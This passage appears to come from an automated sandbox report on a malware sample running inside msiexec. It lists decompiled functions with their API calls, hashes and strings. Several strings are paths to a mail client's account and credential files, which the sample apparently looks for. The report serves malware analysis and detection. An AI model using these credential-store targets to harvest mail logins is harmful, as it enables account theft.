                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D72
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D7D
                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21201D8A
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 1454806937-0
                                                              • Opcode ID: 206eb4228462af133a982404b130089416315ec2f065af5911dfc4132e77cda4
                                                              • Instruction ID: 60025998c7ad19ef57daa4cdf0bd9646680c70738571a3bda5ef448f54e93e0b
                                                              • Opcode Fuzzy Hash: 206eb4228462af133a982404b130089416315ec2f065af5911dfc4132e77cda4
                                                              • Instruction Fuzzy Hash: 0D21FCB194222DAFE710EBA08CCCFFB76BCEB29395F000665F615D2140D6759E458B70
                                                              Function 21209492 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 361 21209492-212094ef GetConsoleCP 362 21209632-21209644 call 21202ada 361->362 363 212094f5-21209511 361->363 364 21209513-2120952a 363->364 365 2120952c-2120953d call 21207c19 363->365 367 21209566-21209575 call 212079e6 364->367 372 21209563-21209565 365->372 373 2120953f-21209542 365->373 367->362 375 2120957b-2120959b WideCharToMultiByte 367->375 372->367 376 21209548-2120955a call 212079e6 373->376 377 21209609-21209628 373->377 375->362 378 212095a1-212095b7 WriteFile 375->378 376->362 384 21209560-21209561 376->384 377->362 380 212095b9-212095ca 378->380 381 2120962a-21209630 GetLastError 378->381 380->362 383 212095cc-212095d0 380->383 381->362 385 212095d2-212095f0 WriteFile 383->385 386 212095fe-21209601 383->386 384->375 385->381 387 212095f2-212095f6 385->387 386->363 388 21209607 386->388 387->362 389 212095f8-212095fb 387->389 388->362 389->386
                                                              APIs
                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21209C07,?,00000000,?,00000000,00000000), ref: 212094D4
                                                              • __fassign.LIBCMT ref: 2120954F
                                                              • __fassign.LIBCMT ref: 2120956A
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21209590
                                                              • WriteFile.KERNEL32(?,?,00000000,21209C07,00000000,?,?,?,?,?,?,?,?,?,21209C07,?), ref: 212095AF
                                                              • WriteFile.KERNEL32(?,?,?,21209C07,00000000,?,?,?,?,?,?,?,?,?,21209C07,?), ref: 212095E8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                              • String ID:
                                                              • API String ID: 1324828854-0
                                                              • Opcode ID: 6fae25692be3753174f17aef85d0dd44f0c439ea60e2a2ce7da439900de47f13
                                                              • Instruction ID: 64838f62df333234a9e0ad9fc121f6428e3149c2fa50f24c3ac391c86ed3f7be
                                                              • Opcode Fuzzy Hash: 6fae25692be3753174f17aef85d0dd44f0c439ea60e2a2ce7da439900de47f13
                                                              • Instruction Fuzzy Hash: 73519171900209AFDF00CFA4DC95AEEBBF9EF29310F14421AF666F7281D631A941CB60
                                                              Function 21203370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 390 21203370-212033b5 call 21203330 call 212037a7 395 21203416-21203419 390->395 396 212033b7-212033c9 390->396 397 21203439-21203442 395->397 398 2120341b-21203428 call 21203790 395->398 396->397 399 212033cb 396->399 402 2120342d-21203436 call 21203330 398->402 401 212033d0-212033e7 399->401 403 212033e9-212033f7 call 21203740 401->403 404 212033fd 401->404 402->397 412 212033f9 403->412 413 2120340d-21203414 403->413 407 21203400-21203405 404->407 407->401 410 21203407-21203409 407->410 410->397 411 2120340b 410->411 411->402 414 21203443-2120344c 412->414 415 212033fb 412->415 413->402 416 21203486-21203496 call 21203774 414->416 417 2120344e-21203455 414->417 415->407 422 21203498-212034a7 call 21203790 416->422 423 212034aa-212034c6 call 21203330 call 21203758 416->423 417->416 419 21203457-21203466 call 2120bbe0 417->419 427 21203483 419->427 428 21203468-21203480 419->428 422->423 427->416 428->427
                                                              APIs
                                                              • _ValidateLocalCookies.LIBCMT ref: 2120339B
                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 212033A3
                                                              • _ValidateLocalCookies.LIBCMT ref: 21203431
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 2120345C
                                                              • _ValidateLocalCookies.LIBCMT ref: 212034B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 570bf8ffe41b41172c1abd8ff59ee9cdc49cd0e5b934e2ef9c9b36469e13efcf
                                                              • Instruction ID: 0475589208d819819873293309286261395284277d4ee44b5026bdecdb0cb721
                                                              • Opcode Fuzzy Hash: 570bf8ffe41b41172c1abd8ff59ee9cdc49cd0e5b934e2ef9c9b36469e13efcf
                                                              • Instruction Fuzzy Hash: E141C538E0820A9FCB05CF68CD84A9FBBB5EF65324F118259FA149B351D735EA01CB90
                                                              Function 2120925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 21209221: _free.LIBCMT ref: 2120924A
                                                              • _free.LIBCMT ref: 212092AB
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 212092B6
                                                              • _free.LIBCMT ref: 212092C1
                                                              • _free.LIBCMT ref: 21209315
                                                              • _free.LIBCMT ref: 21209320
                                                              • _free.LIBCMT ref: 2120932B
                                                              • _free.LIBCMT ref: 21209336
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction ID: 0fa449960e46f36df9bb3a3627d9186a4606aceeb8f20a1c6cb1f9f635a1b9c8
                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                              • Instruction Fuzzy Hash: 8A118E31544B09FEDB20AFB0DC45FEB7B9DAF34700F400A24BA9EB60A2DA24B5249751
                                                              Function 21208821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 472 21208821-2120883a 473 21208850-21208855 472->473 474 2120883c-2120884c call 21209341 472->474 476 21208862-21208886 MultiByteToWideChar 473->476 477 21208857-2120885f 473->477 474->473 481 2120884e 474->481 479 21208a19-21208a2c call 21202ada 476->479 480 2120888c-21208898 476->480 477->476 482 2120889a-212088ab 480->482 483 212088ec 480->483 481->473 487 212088ca-212088db call 212056d0 482->487 488 212088ad-212088bc call 2120bf20 482->488 486 212088ee-212088f0 483->486 490 212088f6-21208909 MultiByteToWideChar 486->490 491 21208a0e 486->491 487->491 498 212088e1 487->498 488->491 497 212088c2-212088c8 488->497 490->491 495 2120890f-2120892a call 21205f19 490->495 496 21208a10-21208a17 call 21208801 491->496 495->491 504 21208930-21208937 495->504 496->479 501 212088e7-212088ea 497->501 498->501 501->486 505 21208971-2120897d 504->505 506 21208939-2120893e 504->506 507 212089c9 505->507 508 2120897f-21208990 505->508 506->496 509 21208944-21208946 506->509 510 212089cb-212089cd 507->510 512 21208992-212089a1 call 2120bf20 508->512 513 212089ab-212089bc call 212056d0 508->513 509->491 511 2120894c-21208966 call 21205f19 509->511 514 21208a07-21208a0d call 21208801 510->514 515 212089cf-212089e8 call 21205f19 510->515 511->496 525 2120896c 511->525 512->514 527 212089a3-212089a9 512->527 513->514 528 212089be 513->528 514->491 515->514 529 212089ea-212089f1 515->529 525->491 530 212089c4-212089c7 527->530 528->530 531 212089f3-212089f4 529->531 532 21208a2d-21208a33 529->532 530->510 533 212089f5-21208a05 WideCharToMultiByte 531->533 532->533 533->514 534 21208a35-21208a3c call 21208801 533->534 534->496
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21206FFD,00000000,?,?,?,21208A72,?,?,00000100), ref: 2120887B
                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,21208A72,?,?,00000100,5EFC4D8B,?,?), ref: 21208901
                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 212089FB
                                                              • __freea.LIBCMT ref: 21208A08
                                                                • Part of subcall function 212056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21205702
                                                              • __freea.LIBCMT ref: 21208A11
                                                              • __freea.LIBCMT ref: 21208A36
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1414292761-0
                                                              • Opcode ID: f3e7af1f42f1b6268e72bda07ca128da4036e6c76918d1f48a779e1757279c6c
                                                              • Instruction ID: cea7b43dc74471ab0810ef32d00899935b16f671760ca941888903e42c968ad9
                                                              • Opcode Fuzzy Hash: f3e7af1f42f1b6268e72bda07ca128da4036e6c76918d1f48a779e1757279c6c
                                                              • Instruction Fuzzy Hash: FC51D372A1021BAFEB158E64DC45EBB3BAAEB65750F11473DFE04D6140EB35EC908B90
                                                              Function 212015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • _strlen.LIBCMT ref: 21201607
                                                              • _strcat.LIBCMT ref: 2120161D
                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2120190E,?,?,00000000,?,00000000), ref: 21201643
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,2120190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 2120165A
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,2120190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21201661
                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,2120190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 21201686
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                              • String ID:
                                                              • API String ID: 1922816806-0
                                                              • Opcode ID: e8d7591658e41f0736fa48c72dddf1596bea8eea24b18f8301a0e439d25951b7
                                                              • Instruction ID: 39e2e099bf468e2aa406f7cc97aa44a983ce922b7ebd78263ab00328eed3b14f
                                                              • Opcode Fuzzy Hash: e8d7591658e41f0736fa48c72dddf1596bea8eea24b18f8301a0e439d25951b7
                                                              • Instruction Fuzzy Hash: 6E21C536900215AFDB04DBA4DC84FFE7BB8EFA8710F24811AF604AB181DB35F54187A5
                                                              Function 21201000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 21201038
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 2120104B
                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 21201061
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 21201075
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 21201090
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 212010B8
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                              • String ID:
                                                              • API String ID: 3594823470-0
                                                              • Opcode ID: 1c241eb24bbc2fd9b09e80c82350d06494c20dcedf0d9fb04ef0f4fd50361b0f
                                                              • Instruction ID: 3d70dd4649671f8b353c4ab339614e7d2680e27ad2292d4dd1ac9f12df3b64af
                                                              • Opcode Fuzzy Hash: 1c241eb24bbc2fd9b09e80c82350d06494c20dcedf0d9fb04ef0f4fd50361b0f
                                                              • Instruction Fuzzy Hash: AF21833590032D9BCF14DBA0DC48EDF3769EF64314F104356F999971A1DA31DA85CB40
                                                              Function 21203856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,21203518,212023F1,21201F17), ref: 21203864
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 21203872
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 2120388B
                                                              • SetLastError.KERNEL32(00000000,?,21203518,212023F1,21201F17), ref: 212038DD
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 0f897e9ba3ddadfc2e05a3d7a5fbe43eb8ea3a4a06a7b9f819433e68e61215e8
                                                              • Instruction ID: a72f27abc2228a707c388704ed5ac14e3cc1a8f268292ed59c2fc8062bc0db8c
                                                              • Opcode Fuzzy Hash: 0f897e9ba3ddadfc2e05a3d7a5fbe43eb8ea3a4a06a7b9f819433e68e61215e8
                                                              • Instruction Fuzzy Hash: 4101F73264DB135EF70596796E8D9672B9AEF36778B20037AF210950E2FF1659018340
                                                              Function 21205AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,21206C6C), ref: 21205AFA
                                                              • _free.LIBCMT ref: 21205B2D
                                                              • _free.LIBCMT ref: 21205B55
                                                              • SetLastError.KERNEL32(00000000,?,?,21206C6C), ref: 21205B62
                                                              • SetLastError.KERNEL32(00000000,?,?,21206C6C), ref: 21205B6E
                                                              • _abort.LIBCMT ref: 21205B74
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free$_abort
                                                              • String ID:
                                                              • API String ID: 3160817290-0
                                                              • Opcode ID: ad01a9fadf588a4547ebb4fd49a1a5ca70f154321f92cc813bf747194fa2c3ef
                                                              • Instruction ID: 4489c8a040e13d3adb87c5c58630f56628ee297dd9cd580ce6fcd3677caa8882
                                                              • Opcode Fuzzy Hash: ad01a9fadf588a4547ebb4fd49a1a5ca70f154321f92cc813bf747194fa2c3ef
                                                              • Instruction Fuzzy Hash: 43F0CD31545D036FD30257346C4DE1F1AAE8FF2771B150314FA18A6185FE29A9024664
                                                              Function 212011EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 21201E89: lstrlenW.KERNEL32(?,?,?,?,?,212010DF,?,?,?,00000000), ref: 21201E9A
                                                                • Part of subcall function 21201E89: lstrcatW.KERNEL32(?,?,?,212010DF,?,?,?,00000000), ref: 21201EAC
                                                                • Part of subcall function 21201E89: lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EB3
                                                                • Part of subcall function 21201E89: lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EC8
                                                                • Part of subcall function 21201E89: lstrcatW.KERNEL32(?,212010DF,?,212010DF,?,?,?,00000000), ref: 21201ED3
                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 2120122A
                                                                • Part of subcall function 2120173A: _strlen.LIBCMT ref: 21201855
                                                                • Part of subcall function 2120173A: _strlen.LIBCMT ref: 21201869
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                              • API String ID: 4036392271-1520055953
                                                              • Opcode ID: a87451d36c0a7f4932f07bec1a0f8571bec86282d4a575255a2a065d6a18fead
                                                              • Instruction ID: c28a1f50be0bbbe5923741927f2ca3f795407e7e0b69970a2b98fa5da40fe2de
                                                              • Opcode Fuzzy Hash: a87451d36c0a7f4932f07bec1a0f8571bec86282d4a575255a2a065d6a18fead
                                                              • Instruction Fuzzy Hash: 092193B9A502286BEB10DBE0EC81FFD7339EFA0714F000656F604EB1D5E6B16E808759
                                                              Function 21204B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,21204AEA,?,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000), ref: 21204B59
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 21204B6C
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,21204AEA,?,?,21204A8A,?,21212238,0000000C,21204BBD,00000000,00000000,?,21202082), ref: 21204B8F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 48068b45145096657f8c6e8a3f0816e9a156d17fd8fcabe7139d3f03565d0a1c
                                                              • Instruction ID: 40e2d3ff3cc3242481697eac8dad53f3ca464521e9eb173877bab2fc7415e2e2
                                                              • Opcode Fuzzy Hash: 48068b45145096657f8c6e8a3f0816e9a156d17fd8fcabe7139d3f03565d0a1c
                                                              • Instruction Fuzzy Hash: B2F03C3194150DBBDB119F95CC08BAEBFBAEF25361F004268FA09A6150EB369941CB90
                                                              Function 21207153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 2120715C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 2120717F
                                                                • Part of subcall function 212056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21205702
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 212071A5
                                                              • _free.LIBCMT ref: 212071B8
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 212071C7
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: 917a979f97769dcdeb8d652f2d51bf5c610f3acfdd08f717eab513b1ea5c3181
                                                              • Instruction ID: 96e1996636f8fc18a24365d9a636c27d120308af93c09a4f1491ef6189fd35ad
                                                              • Opcode Fuzzy Hash: 917a979f97769dcdeb8d652f2d51bf5c610f3acfdd08f717eab513b1ea5c3181
                                                              • Instruction Fuzzy Hash: E201AC72602216BF33114ABA5C4CD7BBE7FDEE7AA0310036DBE44C7280EE669C0191B4
                                                              Function 21205B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000000,2120636D,21205713,00000000,?,21202249,?,?,21201D66,00000000,?,?,00000000), ref: 21205B7F
                                                              • _free.LIBCMT ref: 21205BB4
                                                              • _free.LIBCMT ref: 21205BDB
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21205BE8
                                                              • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21205BF1
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: 305e2687e09f780e66c797155e878c0c8744fb7727a37872d9715de7cf737990
                                                              • Instruction ID: 05f5bb24d70aec96f2e16282e570cc5e689846431e2400fbe8fc4d95480789b9
                                                              • Opcode Fuzzy Hash: 305e2687e09f780e66c797155e878c0c8744fb7727a37872d9715de7cf737990
                                                              • Instruction Fuzzy Hash: 8801A976155E03AB930396345C88E2F2A6EDBF27B07110314FD19A615AFE75B9024664
                                                              Function 21201E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,?,?,212010DF,?,?,?,00000000), ref: 21201E9A
                                                              • lstrcatW.KERNEL32(?,?,?,212010DF,?,?,?,00000000), ref: 21201EAC
                                                              • lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EB3
                                                              • lstrlenW.KERNEL32(?,?,212010DF,?,?,?,00000000), ref: 21201EC8
                                                              • lstrcatW.KERNEL32(?,212010DF,?,212010DF,?,?,?,00000000), ref: 21201ED3
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$lstrcat
                                                              • String ID:
                                                              • API String ID: 493641738-0
                                                              • Opcode ID: 9e38fb956bd8f5762d1fdc8399ab2f2e1333007473ca6d046321d11b95845165
                                                              • Instruction ID: e1732a5001b83d7d04d79f9bfb5d0602caf1a123bd723eec0de88976a2a09dd2
                                                              • Opcode Fuzzy Hash: 9e38fb956bd8f5762d1fdc8399ab2f2e1333007473ca6d046321d11b95845165
                                                              • Instruction Fuzzy Hash: EAF089261411147AE7216759AC89F7F7F7CEFD6B60F44011DF70C83190DB56584293B5
                                                              Function 212091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 212091D0
                                                                • Part of subcall function 2120571E: HeapFree.KERNEL32(00000000,00000000,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?), ref: 21205734
                                                                • Part of subcall function 2120571E: GetLastError.KERNEL32(?,?,2120924F,?,00000000,?,00000000,?,21209276,?,00000007,?,?,21207E5A,?,?), ref: 21205746
                                                              • _free.LIBCMT ref: 212091E2
                                                              • _free.LIBCMT ref: 212091F4
                                                              • _free.LIBCMT ref: 21209206
                                                              • _free.LIBCMT ref: 21209218
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3407799284.0000000021201000.00000040.00001000.00020000.00000000.sdmp, Offset: 21200000, based on PE: true
                                                              • Associated: 0000000E.00000002.3407776764.0000000021200000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 0000000E.00000002.3407799284.0000000021216000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_21200000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
